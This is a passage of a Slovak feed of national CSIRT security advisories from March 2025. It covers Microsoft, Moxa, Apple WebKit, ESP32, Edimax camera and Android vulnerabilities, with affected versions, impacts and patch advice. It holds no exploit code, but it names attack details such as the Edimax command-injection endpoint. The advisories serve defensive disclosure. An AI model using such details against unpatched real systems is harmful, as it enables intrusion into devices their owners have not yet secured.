<p>Zraniteľnosti spočívajúce v čítaní mimo povolených hodnôt (CVE-2025-24991) a pretečení medzipamäte haldy&nbsp; (CVE-2025-24993) v&nbsp;rámci komponentu <strong>Windows NTFS</strong> by vzdialený útočník mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong> alebo <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>, ktorý musí pripojiť špeciálne vytvorený VHD disk.</p>



<p><strong>CVE-2025-24985 </strong>(CVSS skóre 7,8)</p>



<p><strong>Windows Fast FAT File System Driver</strong> obsahuje zraniteľnosť spočívajúcu v&nbsp;pretečení celočíselnej premennej a&nbsp;medzipamäte haldy a&nbsp;možno ju zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>, ktorý musí pripojiť špeciálne vytvorený VHD disk.</p>



<p><strong>Uvedené zraniteľnosti sú v&nbsp;súčasnosti aktívne zneužívané útočníkmi.</strong></p>



<p>     <strong>III. Ostatné významné zraniteľnosti:</strong></p>



<p><strong>17 vysoko závažných</strong> zraniteľností v&nbsp;produktoch <strong>Microsoft Office</strong> (CVE-2025-24080, CVE-2025-24083, CVE-2025-26629), <strong>Microsoft Excel</strong> (CVE-2025-24075, CVE-2025-24081, CVE-2025-24082), <strong>Microsoft Word</strong> (CVE-2025-24077, CVE-2025-24078, CVE-2025-24079), <strong>Microsoft Access</strong> (CVE-2025-26630), <strong>Azure Promptflow</strong> (CVE-2025-24986) a&nbsp;komponentoch <strong>Windows exFAT File System</strong> (CVE-2025-21180), <strong>WinDbg</strong> (CVE-2025-24043), Windows Routing and Remote Access Service (RRAS) (CVE-2025-24051), <strong>Windows Telephony Service</strong> (CVE-2025-24056), <strong>Windows Fast FAT File System Driver</strong> (CVE-2025-24985), <strong>Windows NTFS</strong> (CVE-2025-24993) možno zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladné nasadenie februárového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete&nbsp;<a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Mar">tu</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Mar">https://msrc.microsoft.com/update-guide/releaseNote/2025-Mar</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24035">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24035</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24045">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24045</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24053">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24053</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24057">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24057</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24064">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24064</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24084">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24084</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26645">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26645</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24983">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24983</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24984">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24984</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24985">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24985</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24991">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24991</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24993">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24993</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26633">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26633</a></li>



<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2025-patch-tuesday-fixes-7-zero-days-57-flaws/">https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2025-patch-tuesday-fixes-7-zero-days-57-flaws/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2182/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v priemyselných switchoch Moxa</title>
		<link>/posts/2180</link>
					<comments>/posts/2180#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:43:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Moxa]]></category>
		<category><![CDATA[Unauthorized access]]></category>
		<guid isPermaLink="false">/?p=2180</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/moxa-inc-vector-logo.png" alt="" /></p>Spoločnosť Moxa vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v priemyselných switchoch série PT a EDS-508A. CVE-2024-12297 by vzdialený útočník...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/moxa-inc-vector-logo.png" alt="" /></p>
<p><strong>Spoločnosť Moxa vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v priemyselných switchoch série PT a EDS-508A. CVE-2024-12297 by vzdialený útočník mohol zneužiť na realizáciu útokov na báze brute-force a&nbsp;MD5 kolízií, obídenie mechanizmov autentifikácie a&nbsp;získanie neoprávneného prístupu do systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PT-508 Series s firmwarom vo verziách starších ako 3.8 (vrátane) </li>



<li>PT-510 Series s firmwarom vo verziách starších ako 3.8 (vrátane)</li>



<li>PT-7528 Series s firmwarom vo verziách starších ako 5.0 (vrátane)</li>



<li>PT-7728 Series s firmwarom vo verziách starších ako 3.9 (vrátane)</li>



<li>PT-7828 Series s firmwarom vo verziách starších ako 4.0 (vrátane)</li>



<li>PT-G503 Series s firmwarom vo verziách starších ako 5.3 (vrátane)</li>



<li>PT-G510 Series s firmwarom vo verziách starších ako 6.5 (vrátane)</li>



<li>PT-G7728 Series s firmwarom vo verziách starších ako 6.5 (vrátane)</li>



<li>PT-G7828 Series s firmwarom vo verziách starších ako 6.5 (vrátane)</li>



<li>EDS-508A Series s firmwarom vo verziách starších ako 3.11 (vrátane)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-12297 </strong>(CVSS 4.0 skóre: 9.2)</p>



<p>Zraniteľnosť s označením CVE-2024-12297 spočíva v prítomnosti bližšie nešpecifikovaných chýb v autorizačnom mechanizme a vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu do systému</strong>. Podľa výrobcu zraniteľnosť umožňuje realizáciu útokov typu brute-force a útokov založených na hľadaní MD5 kolízií, prostredníctvom ktorých možno získať platné prihlasovacie údaje alebo autentifikačné hashe. </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná inštaláciu bezpečnostných záplat, ktoré je možné stiahnuť kontaktovaním <a href="https://www.moxa.com/support/support/technical-support">technickej podpory spoločnosti Moxa</a>.</p>



<p>Výrobca na zvýšenie celkovej úrovne bezpečnosti zariadení taktiež odporúča:</p>



<ul>
<li>limitovať sieťový a&nbsp;vzdialený prístup k&nbsp;zariadeniam a systémom len na dôveryhodné IP adresy a&nbsp;siete</li>



<li>v&nbsp;rámci autentifikácie a&nbsp;riadenia prístupu nasadiť viacfaktorovú autentifikáciu a&nbsp;aplikovať princíp minimálnych privilégií</li>



<li>vykonávať pravidelnú aktualizáciu systémov, vrátane firmwaru</li>



<li>v&nbsp;infraštruktúre zaviesť centralizovaný zber logov a&nbsp;systémy pre monitoring podozrivej sieťovej aktivity</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241408-cve-2024-12297-frontend-authorization-logic-disclosure-vulnerability-identified-in-pt-switches">https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241408-cve-2024-12297-frontend-authorization-logic-disclosure-vulnerability-identified-in-pt-switches</a></li>



<li><a href="https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241407-cve-2024-12297-frontend-authorization-logic-disclosure-vulnerability-in-eds-508a-series">https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241407-cve-2024-12297-frontend-authorization-logic-disclosure-vulnerability-in-eds-508a-series</a></li>



<li><a href="https://thehackernews.com/2025/03/moxa-issues-fix-for-critical.html">https://thehackernews.com/2025/03/moxa-issues-fix-for-critical.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2180/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zero-day zraniteľnosť v operačných systémoch Apple</title>
		<link>/posts/2178</link>
					<comments>/posts/2178#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:41:18 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2178</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple vydala bezpečnostné aktualizácie na svoje operačné systémy iOS, iPadOS, macOS Sequoia, visionOS a webový prehliadač Safari, ktoré opravujú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple vydala bezpečnostné aktualizácie na svoje operačné systémy iOS, iPadOS, macOS Sequoia, visionOS a webový prehliadač Safari, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. Zraniteľnosť CVE-2025-24201 v komponente WebKit by útočník podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na únik z Web Content sandboxu a&nbsp;vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia s operačným systémom iOS vo verziách starších ako 18.3.2</li>



<li>Zariadenia s operačným systémom iPadOS vo verziách starších ako 18.3.2</li>



<li>Zariadenia s operačným systémom macOS Sequoia vo verziách starších ako 15.3.2</li>



<li>Zariadenia s operačným systémom visionOS vo verziách starších ako 2.3.2</li>



<li>Apple Safari vo verziách starších ako 18.3.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-24201 </strong>(CVSS skóre: 8.8)</p>



<p>Zraniteľnosť v komponente <strong>WebKit </strong>spočíva v možnosti zápisu do pamäte mimo povolených hodnôt a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na <strong>únik z Web Content sandboxu a vzdialené vykonanie kódu</strong>.</p>



<p><strong>Spoločnosť Apple uviedla, že zraniteľnosť môže byť aktívne zneužívaná v rámci sofistikovaných útokov cielených na používateľov zariadení s iOS vo verziách starších ako 17.2.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Apple odporúča bezodkladnú aktualizáciu operačných systémov iOS a iPadOS na verziu 18.3.2, macOS Sequoia na verziu 15.3.2, visionOS na verziu 2.3.2 a webový prehliadač Safari na verziu 18.3.1. </p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/122281">https://support.apple.com/en-us/122281</a></li>



<li><a href="https://support.apple.com/en-us/122283">https://support.apple.com/en-us/122283</a></li>



<li><a href="https://support.apple.com/en-us/122284">https://support.apple.com/en-us/122284</a></li>



<li><a href="https://support.apple.com/en-us/122285">https://support.apple.com/en-us/122285</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24201">https://nvd.nist.gov/vuln/detail/CVE-2025-24201</a></li>



<li><a href="https://thehackernews.com/2025/03/apple-releases-patch-for-webkit-zero.html">https://thehackernews.com/2025/03/apple-releases-patch-for-webkit-zero.html</a></li>



<li><a href="https://sensorstechforum.com/cve-2025-24201-apple-zero-day/">https://sensorstechforum.com/cve-2025-24201-apple-zero-day/</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/402946">https://exchange.xforce.ibmcloud.com/vulnerabilities/402946</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2178/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Čipy Espressif ESP32 obsahujú nezdokumentované funkcie</title>
		<link>/posts/2175</link>
					<comments>/posts/2175#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:39:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Espressif]]></category>
		<category><![CDATA[Unauthorized access]]></category>
		<guid isPermaLink="false">/?p=2175</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Espressif.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti Tarlogic zverejnili informácie o&#160;existencii nezdokumentovaných funkcií v&#160;čipoch ESP32, ktoré sú súčasťou veľkého množstva inteligentných a&#160;IoT (Internet...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Espressif.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti Tarlogic zverejnili informácie o&nbsp;existencii nezdokumentovaných funkcií v&nbsp;čipoch ESP32, ktoré sú súčasťou veľkého množstva inteligentných a&nbsp;IoT (Internet of Things) zariadení po celom svete. CVE-2025-27840 by útočník s&nbsp;fyzickým prístupom mohol zneužiť na vykonanie neoprávnených zmien v&nbsp;systéme a získanie úplnej kontroly nad zariadeniami. Spoločnosť Espressif sa vyjadrila, že sa jedná o&nbsp;príkazy pre účely interného testovania a&nbsp;nie bezpečnostnú zraniteľnosť.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Systémy a&nbsp;zariadenia s&nbsp;čipmi Espressif ESP32</li>
</ul>



<p><strong>Pozn.: Pretože sú čipy ESP32 používané celosvetovo a poskytujú Bluetooth a WiFi konektivitu v rámci rôznych inteligentných a&nbsp;IoT zariadení, v súčasnosti neexistuje vyčerpávajúci zoznam zasiahnutých systémov.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-27840 </strong>(CVSS 3.1 skóre: 6,8)</p>



<p>Čipy ESP32 obsahujú 29 nezdokumentovaných funkcií, súhrnne označených identifikátorom CVE-2025-27840. Útočník s&nbsp;fyzickým prístupom k&nbsp;zariadeniu a&nbsp;oprávneniami administrátora by ich mohol zneužiť na <strong>čítanie a modifikáciu obsahu RAM a Flash pamäte</strong>, <strong>spoofovanie MAC adries</strong> a <strong>injekciu LMP/LLCP paketov</strong>, čo môže mať za následok <strong>zneprístupnenie služby</strong> alebo <strong>získanie úplnej kontroly nad zariadením</strong>.</p>



<p><a href="https://www.espressif.com/en/news/Response_ESP32_Bluetooth"><strong>Podľa vyjadrenia výrobcu</strong></a><strong> sa jedná o debugovacie príkazy, ktoré sú súčasťou jeho implementácie protokolu HCI (Host Controller Interface) používaného v technológii&nbsp;Bluetooth. Príkazy využíva v rámci interného testovania a plánuje ich odstrániť vydaním aktualizácie softvéru.</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Pretože sú čipy ESP32 používané celosvetovo v rámci rôznych produktov a v súčasnosti neexistuje ich vyčerpávajúci zoznam, administrátorom a&nbsp;používateľom inteligentných a&nbsp;IoT zariadení odporúčame&nbsp; aplikovať všeobecne známe best practice postupy pre ich zabezpečenie. Mimoriadnu pozornosť treba venovať <strong>pravidelnej aktualizácii firmvéru</strong> a <strong>obmedzeniu prístupu k zariadeniam len na dôveryhodné IP adresy</strong>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-27840">https://www.cve.org/CVERecord?id=CVE-2025-27840</a></li>



<li><a href="https://www.espressif.com/en/news/Response_ESP32_Bluetooth">https://www.espressif.com/en/news/Response_ESP32_Bluetooth</a></li>



<li><a href="https://www.tarlogic.com/news/backdoor-esp32-chip-infect-ot-devices/">https://www.tarlogic.com/news/backdoor-esp32-chip-infect-ot-devices/</a></li>



<li><a href="https://darkmentor.com/blog/esp32_non-backdoor/">https://darkmentor.com/blog/esp32_non-backdoor/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2175/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť v IP kamerách Edimax IC-7100</title>
		<link>/posts/2172</link>
					<comments>/posts/2172#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:35:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Edimax]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2172</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Edimax.png" alt="" /></p>Bezpečnostní výskumníci zverejnili informácie o&#160;aktívne zneužívanej kritickej zraniteľnosti v IP kamerách Edimax IC-7100 (produkt s&#160;ukončenou podporou). Zraniteľnosť s&#160;identifikátorom CVE-2025-1316 možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Edimax.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zverejnili informácie o&nbsp;aktívne zneužívanej kritickej zraniteľnosti v IP kamerách Edimax IC-7100 (produkt s&nbsp;ukončenou podporou). Zraniteľnosť s&nbsp;identifikátorom CVE-2025-1316 možno zneužiť na vzdialené vykonanie kódu s&nbsp;následkom úplného narušenia dôvernosti, integrity a&nbsp;dostupnosti systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>IP kamery Edimax IC-7100 vo všetkých verziách (ukončená podpora)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-1316 </strong>(CVSS 3.1 skóre: 9,8)</p>



<p>Kritická zraniteľnosť spočíva v nesprávnom ošetrení špeciálnych elementov v rámci požiadaviek a vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek na /camera-cgi/admin/param.cgi mohol zneužiť na <strong>injekciu príkazov operačného systému</strong> a následné <strong>vykonanie kódu</strong>.</p>



<p><strong>Podľa bezpečnostných výskumníkov zo spoločnosti Akamai je zraniteľnosť aktívne zneužívaná minimálne od mája 2024. </strong>Útočníci kompromitované zariadenia zapájajú do rôznych botnetov, vrátane botnetov na báze Mirai.Experti z&nbsp;<a href="https://www.akamai.com/blog/security-research/march-edimax-cameras-command-injection-mirai">Akamai vo svojej analýze</a> naznačili, že zraniteľné môžu byť ďalšie IoT (Internet of Things) zariadenia od spoločnosti Edimax.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Vzhľadom na to, že sa jedná o produkty s ukončenou technickou podporou, výrobca neplánuje vydať aktualizácie. Administrátorom a používateľom odporúčame prejsť na alternatívne produkty s platnou podporou. V prípade, že migrácia na iný produkt nie je možná, odporúčame limitovať prístup k zariadeniu len na dôveryhodné IP adresy.<strong></strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-063-08">https://www.cisa.gov/news-events/ics-advisories/icsa-25-063-08</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-1316">https://nvd.nist.gov/vuln/detail/CVE-2025-1316</a></li>



<li><a href="https://www.akamai.com/blog/security-research/march-edimax-cameras-command-injection-mirai">https://www.akamai.com/blog/security-research/march-edimax-cameras-command-injection-mirai</a></li>



<li><a href="https://www.securityweek.com/unpatched-edimax-camera-flaw-exploited-since-at-least-may-2024/">https://www.securityweek.com/unpatched-edimax-camera-flaw-exploited-since-at-least-may-2024/</a></li>



<li><a href="https://www.securityweek.com/edimax-says-no-patches-coming-for-zero-day-exploited-by-botnets/">https://www.securityweek.com/edimax-says-no-patches-coming-for-zero-day-exploited-by-botnets/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2172/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Google opravil 2 aktívne zneužívané zero-day zraniteľnosti operačného systému Android</title>
		<link>/posts/2170</link>
					<comments>/posts/2170#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:33:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2170</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/android-1024x683.jpg" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Android, ktoré opravujú 44 zraniteľností, z čoho 10 je označených ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/android-1024x683.jpg" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Android, ktoré opravujú 44 zraniteľností, z čoho 10 je označených ako kritické a 2 ako aktívne zneužívané.</strong> <strong>CVE-2024-43093 v komponente Framework a CVE-2024-50302 v&nbsp;komponente HID USB možno zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom v&nbsp;systémových priečinkoch a&nbsp;kernel pamäti.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia s&nbsp;operačným systémom Android bez aktualizácie z&nbsp;05.03.2025</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Kritické zraniteľnosti:</u></strong></p>



<p>Najzávažnejšie zraniteľnosti možno zneužiť na <strong>vzdialené vykonanie kódu (</strong>CVE-2025-0074, CVE-2025-0075, CVE-2025-0084, CVE-2025-22403, CVE-2025-22408, CVE-2025-22410, CVE-2025-22411, CVE-2025-22412), <strong>eskaláciu privilégií </strong>(CVE-2025-22409) a&nbsp;<strong>zneprístupnenie služby </strong>(CVE-2025-0081).</p>



<p><strong><u>Aktívne zneužívané zraniteľnosti:</u></strong></p>



<p><strong>CVE-2024-43093 </strong>(CVSS 3.1 skóre: 7,8)</p>



<p>Zraniteľnosť nachádzajúcu sa v komponente Framework možno zneužiť na <strong>eskaláciu privilégií</strong> a <strong>získanie neoprávneného prístupu</strong> <strong>k obsahu</strong> systémových priečinkov Android/data, Android/obb a Android/sandbox.</p>



<p><strong>CVE-2024-50302 </strong>(CVSS 3.1 skóre: 7,8)</p>



<p>Komponent HID, ktorého ovládač je súčasťou Linux kernelu, obsahuje zraniteľnosť, ktorú možno zneužiť na <strong>získanie neoprávneného prístupu k údajom</strong> zneužitím neinicializovanej pamäte kernelu.</p>



<p><strong>Pozn.: Zraniteľnosti s&nbsp;označením CVE-2024-43093 a CVE-2024-50302 sú v&nbsp;súčasnosti aktívne zneužívané.</strong></p>



<p><strong>Na základe </strong><a href="https://securitylab.amnesty.org/latest/2025/02/cellebrite-zero-day-exploit-used-to-target-phone-of-serbian-student-activist/"><strong>analýzy Amnesty International</strong></a><strong> </strong>(ďalej len AI)<strong> bola zraniteľnosť CVE-2024-50302 údajne zneužívaná v rámci forenzných nástrojov Cellebrite, ktoré boli údajne v&nbsp;polovici roka 2024 zneužité srbskou vládou na odomknutie zariadenia Android aktivistu a&nbsp;pokuse o&nbsp;inštaláciu spyvéru. Podobná </strong><a href="https://www.amnesty.org/en/latest/news/2024/12/serbia-authorities-using-spyware-and-cellebrite-forensic-extraction-tools-to-hack-journalists-and-activists/"><strong>analýza AI z&nbsp;decembra 2024</strong></a><strong> taktiež upozorňovala na možné zneužitie nástrojov Cellebrite na odpočúvanie aktivistov a&nbsp;novinárov zo strany srbskej vlády. </strong>Spoločnosť Cellebrite sa špecializuje na vývoj špecializovaných produktov určených pre orgány činné v trestnom konaní, spravodajské služby a forenzných špecialistov. <strong>V nadväznosti na uvedené analýzy Cellebrite ukončila poskytovanie svojich služieb a&nbsp;produktov pre bližšie nešpecifikovaných zákazníkov v Srbsku.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú inštaláciu aktualizácií operačného systému Android z&nbsp;5. marca 2025.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://source.android.com/docs/security/bulletin/2025-03-01">https://source.android.com/docs/security/bulletin/2025-03-01</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-50302">https://nvd.nist.gov/vuln/detail/CVE-2024-50302</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43093">https://nvd.nist.gov/vuln/detail/CVE-2024-43093</a></li>



<li><a href="http://securitylab.amnesty.org/latest/2025/02/cellebrite-zero-day-exploit-used-to-target-phone-of-serbian-student-activist/">http://securitylab.amnesty.org/latest/2025/02/cellebrite-zero-day-exploit-used-to-target-phone-of-serbian-student-activist/</a></li>



<li><a href="https://cellebrite.com/en/cellebrite-statement-about-amnesty-international-report/">https://cellebrite.com/en/cellebrite-statement-about-amnesty-international-report/</a></li>



<li><a href="https://www.amnesty.org/en/latest/news/2024/12/serbia-authorities-using-spyware-and-cellebrite-forensic-extraction-tools-to-hack-journalists-and-activists/">https://www.amnesty.org/en/latest/news/2024/12/serbia-authorities-using-spyware-and-cellebrite-forensic-extraction-tools-to-hack-journalists-and-activists/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/google-fixes-android-zero-days-exploited-in-targeted-attacks/">https://www.bleepingcomputer.com/news/security/google-fixes-android-zero-days-exploited-in-targeted-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2170/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť knižnice pdfkit pre Python</title>
		<link>/posts/2155</link>
					<comments>/posts/2155#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Mar 2025 15:59:34 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[pdfkit]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2155</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/pdfkit_python-1024x601.png" alt="" /></p>Zhrnutie Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť CVE-2025-26240 v knižnici pdfkit v jazyku Python spočíva v metóde from_string, ktorá spracúva používateľské...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/pdfkit_python-1024x601.png" alt="" /></p>
